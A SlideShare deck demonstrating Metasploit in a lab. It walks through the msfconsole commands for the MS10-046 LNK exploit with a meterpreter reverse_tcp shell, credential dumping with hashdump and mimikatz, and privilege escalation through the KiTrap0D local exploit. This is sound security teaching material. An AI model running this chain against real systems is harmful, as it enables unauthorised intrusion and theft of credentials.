SlideShare a Scribd company logo
Metasploit Demo
Rupam Bhattacharya
Introduction
• It is a free, open source penetration testing
framework started by H. D. Moore in 2003,
which was later acquired by Rapid7. The
current stable versions of the framework are
written using the Ruby language. It has the
world's largest database of tested exploits and
receives more than a million downloads every
year. It is also one of the most complex
projects built in Ruby to date.
Terminology
Vulnerability: It is a weakness which allows an attacker/pentester to break
into or compromise a system's security. This weakness can either exist in the
operating system, application software, or even in the network protocols.
Exploit: Exploit is a code which allows an attacker/tester to take advantage of
the vulnerable system and compromise its security. Every vulnerability has its
own corresponding exploit. Metasploit v4 has more than 1200 exploits.
Payload: It is the actual code which does the work. It runs on the system
after exploitation. They are mostly used to set up a connection between the
attacking and the victim machine. Metasploit v4 has more than 400 payloads.
Module: Modules are the small building blocks of a complete system. Every
module performs a specific task and a complete system is built by combining
several modules to function as a single unit. The biggest advantage of such an
architecture is that it becomes easy for developers to integrate a new exploit
code and tools into the framework.
Demo
• msfconsole
It provides an "all-in-one" centralized console
and allows you efficient access to virtually all
of the options available in the Metasploit
Framework.
Demo
• use
exploit/windows/browser/ms10_046_shortcut_
icon_dllloader
• Also, used in Stuxnet.
• This module exploits a vulnerability in the
handling of Windows Shortcut files (.LNK) that
contain an icon resource pointing to a malicious
DLL. This module creates a WebDAV service that
can be used to run an arbitrary payload when
accessed as a UNC path.
• CVE-2010-2568
Demo
• show options
• set SRVHOST 192.168.56.102
Demo
• set PAYLOAD
windows/meterpreter/reverse_tcp
• Connect back to the attacker, Inject the
meterpreter server DLL via the Reflective Dll
Injection payload (staged).
• set LHOST 192.168.56.102
Demo
Demo
• exploit
Demo
Demo
• show sessions
• sessions -i 1
• help
• sysinfo
Demo
• Getuid
• run post/windows/gather/hashdump
• load mimikatz
– wdigest
Demo
• shell
• net user Rupam
This is a local admin. Now we will try to elevate
privileges to get SYSTEM level access.
Demo
• Background
• use exploit/windows/local/ [TAB TAB]
• use exploit/windows/local/ms10_015_kitrap0d
• This module will create a new session with
SYSTEM privileges via the KiTrap0D exlpoit by
Tavis Ormandy. If the session is use is already
elevated then the exploit will not run. The
module relies on kitrap0d.x86.dll, and is not
supported on x64 editions of Windows.
Demo
• set SESSION 1
• set
PAYLOAD windwos/meterpreter/reverse_tcp
• set LHOST 192.168.56.102
• set LPORT 4443
• show options
• exploit
Demo
Demo
• show sessions
• sessions -i 2
• load mimikatz
– wdigest
Demo
• run post/windows/gather/hashdump
Who am I?
• Rupam Bhattacharya
• Reach me at ru94mb@null.co.in
• Handle: @ru94mb

More Related Content

PPTX
Functional Programming
PPTX
Introduction to Metasploit
 
PPTX
Security in PHP - 那些在滲透測試的小技巧
PPTX
Web Application Penetration Testing Introduction
PDF
Integration testing with spring @snow one
PPTX
Introduction to java
PDF
Thoughts on kafka capacity planning
PDF
The Log4Shell Vulnerability – explained: how to stay secure
Functional Programming
Introduction to Metasploit
 
Security in PHP - 那些在滲透測試的小技巧
Web Application Penetration Testing Introduction
Integration testing with spring @snow one
Introduction to java
Thoughts on kafka capacity planning
The Log4Shell Vulnerability – explained: how to stay secure

What's hot (20)

PPTX
Python final presentation kirti ppt1
PPTX
Java project
PDF
ExpressJS-Introduction.pdf
PPT
Java Multithreading and Concurrency
PPTX
Introduction to java
PPTX
Netbeans
PPTX
Core Java
PPTX
Learn kubernetes in 90 minutes
PDF
PPTX
A Presentation on Development of a Simple Calculator
PPT
Asp.net control
DOCX
Linux or unix interview questions
PPTX
Exception Handling in C#
PPTX
AN INTRODUCTION TO MOBILE APPLICATION DEVELOPMENT
PPT
PPTX
Qt test framework
 
PPTX
PDF
What is Python Lambda Function? Python Tutorial | Edureka
PPT
Chapter 1 introduction to java technology
Python final presentation kirti ppt1
Java project
ExpressJS-Introduction.pdf
Java Multithreading and Concurrency
Introduction to java
Netbeans
Core Java
Learn kubernetes in 90 minutes
A Presentation on Development of a Simple Calculator
Asp.net control
Linux or unix interview questions
Exception Handling in C#
AN INTRODUCTION TO MOBILE APPLICATION DEVELOPMENT
Qt test framework
 
What is Python Lambda Function? Python Tutorial | Edureka
Chapter 1 introduction to java technology
Ad

Similar to Metasploit Demo (20)

PPTX
Introduction of Metasploit and task.pptx
PPTX
Finalppt metasploit
PPTX
Metasploit
PPTX
Metasploit (Module-1) - Getting Started With Metasploit
PPTX
Metasploit
PDF
Exploits Attack on Windows Vulnerabilities
PPTX
metaploit framework
PDF
01 Metasploit kung fu introduction
PPTX
Metasploit Framework and Payloads supported
PPTX
Metasploit framwork
PDF
24 33 -_metasploit
PPTX
Metasploit
PDF
PPTX
The Veil-Framework
PPT
Metasploit-TOI-Ebryx-PVT-Ltd
PPTX
Metasploit framework in Network Security
PPTX
Introduction To Exploitation & Metasploit
PDF
Metasploitation part-1 (murtuja)
PPT
Meta sploit (cyber security)
DOC
Exploit Frameworks
Introduction of Metasploit and task.pptx
Finalppt metasploit
Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit
Exploits Attack on Windows Vulnerabilities
metaploit framework
01 Metasploit kung fu introduction
Metasploit Framework and Payloads supported
Metasploit framwork
24 33 -_metasploit
Metasploit
The Veil-Framework
Metasploit-TOI-Ebryx-PVT-Ltd
Metasploit framework in Network Security
Introduction To Exploitation & Metasploit
Metasploitation part-1 (murtuja)
Meta sploit (cyber security)
Exploit Frameworks
Ad

More from n|u - The Open Security Community (20)

PDF
Hardware security testing 101 (Null - Delhi Chapter)
PPTX
SSRF exploit the trust relationship
PDF
Api security-testing
PDF
Introduction to TLS 1.3
PDF
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
PDF
Talking About SSRF,CRLF
PPTX
Building active directory lab for red teaming
PPTX
Owning a company through their logs
PPTX
Introduction to shodan
PDF
Detecting persistence in windows
PPTX
Frida - Objection Tool Usage
PDF
OSQuery - Monitoring System Process
PDF
DevSecOps Jenkins Pipeline -Security
PDF
Extensible markup language attacks
PPTX
PDF
PDF
News bytes null 200314121904
Hardware security testing 101 (Null - Delhi Chapter)
SSRF exploit the trust relationship
Api security-testing
Introduction to TLS 1.3
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Talking About SSRF,CRLF
Building active directory lab for red teaming
Owning a company through their logs
Introduction to shodan
Detecting persistence in windows
Frida - Objection Tool Usage
OSQuery - Monitoring System Process
DevSecOps Jenkins Pipeline -Security
Extensible markup language attacks
News bytes null 200314121904

Recently uploaded (20)

PPTX
GDM (1) (1).pptx small presentation for students
PPTX
Lesson notes of climatology university.
PDF
TR - Agricultural Crops Production NC III.pdf
PDF
Module 4: Burden of Disease Tutorial Slides S2 2025
PDF
01-Introduction-to-Information-Management.pdf
PPTX
Pharmacology of Heart Failure /Pharmacotherapy of CHF
PPTX
human mycosis Human fungal infections are called human mycosis..pptx
PDF
ANTIBIOTICS.pptx.pdf………………… xxxxxxxxxxxxx
PDF
VCE English Exam - Section C Student Revision Booklet
PPTX
Cell Structure & Organelles in detailed.
PDF
Microbial disease of the cardiovascular and lymphatic systems
PDF
The Lost Whites of Pakistan by Jahanzaib Mughal.pdf
PDF
grade 11-chemistry_fetena_net_5883.pdf teacher guide for all student
PDF
Basic Mud Logging Guide for educational purpose
PDF
Pre independence Education in Inndia.pdf
PPTX
PPH.pptx obstetrics and gynecology in nursing
PDF
RMMM.pdf make it easy to upload and study
PDF
Complications of Minimal Access Surgery at WLH
PPTX
master seminar digital applications in india
PPTX
school management -TNTEU- B.Ed., Semester II Unit 1.pptx
GDM (1) (1).pptx small presentation for students
Lesson notes of climatology university.
TR - Agricultural Crops Production NC III.pdf
Module 4: Burden of Disease Tutorial Slides S2 2025
01-Introduction-to-Information-Management.pdf
Pharmacology of Heart Failure /Pharmacotherapy of CHF
human mycosis Human fungal infections are called human mycosis..pptx
ANTIBIOTICS.pptx.pdf………………… xxxxxxxxxxxxx
VCE English Exam - Section C Student Revision Booklet
Cell Structure & Organelles in detailed.
Microbial disease of the cardiovascular and lymphatic systems
The Lost Whites of Pakistan by Jahanzaib Mughal.pdf
grade 11-chemistry_fetena_net_5883.pdf teacher guide for all student
Basic Mud Logging Guide for educational purpose
Pre independence Education in Inndia.pdf
PPH.pptx obstetrics and gynecology in nursing
RMMM.pdf make it easy to upload and study
Complications of Minimal Access Surgery at WLH
master seminar digital applications in india
school management -TNTEU- B.Ed., Semester II Unit 1.pptx

Metasploit Demo

  • 2. Introduction • It is a free, open source penetration testing framework started by H. D. Moore in 2003, which was later acquired by Rapid7. The current stable versions of the framework are written using the Ruby language. It has the world's largest database of tested exploits and receives more than a million downloads every year. It is also one of the most complex projects built in Ruby to date.
  • 3. Terminology Vulnerability: It is a weakness which allows an attacker/pentester to break into or compromise a system's security. This weakness can either exist in the operating system, application software, or even in the network protocols. Exploit: Exploit is a code which allows an attacker/tester to take advantage of the vulnerable system and compromise its security. Every vulnerability has its own corresponding exploit. Metasploit v4 has more than 1200 exploits. Payload: It is the actual code which does the work. It runs on the system after exploitation. They are mostly used to set up a connection between the attacking and the victim machine. Metasploit v4 has more than 400 payloads. Module: Modules are the small building blocks of a complete system. Every module performs a specific task and a complete system is built by combining several modules to function as a single unit. The biggest advantage of such an architecture is that it becomes easy for developers to integrate a new exploit code and tools into the framework.
  • 4. Demo • msfconsole It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.
  • 5. Demo • use exploit/windows/browser/ms10_046_shortcut_ icon_dllloader • Also, used in Stuxnet. • This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path. • CVE-2010-2568
  • 6. Demo • show options • set SRVHOST 192.168.56.102
  • 7. Demo • set PAYLOAD windows/meterpreter/reverse_tcp • Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). • set LHOST 192.168.56.102
  • 10. Demo
  • 11. Demo • show sessions • sessions -i 1 • help • sysinfo
  • 12. Demo • Getuid • run post/windows/gather/hashdump • load mimikatz – wdigest
  • 13. Demo • shell • net user Rupam This is a local admin. Now we will try to elevate privileges to get SYSTEM level access.
  • 14. Demo • Background • use exploit/windows/local/ [TAB TAB] • use exploit/windows/local/ms10_015_kitrap0d • This module will create a new session with SYSTEM privileges via the KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
  • 15. Demo • set SESSION 1 • set PAYLOAD windwos/meterpreter/reverse_tcp • set LHOST 192.168.56.102 • set LPORT 4443 • show options • exploit
  • 16. Demo
  • 17. Demo • show sessions • sessions -i 2 • load mimikatz – wdigest
  • 19. Who am I? • Rupam Bhattacharya • Reach me at ru94mb@null.co.in • Handle: @ru94mb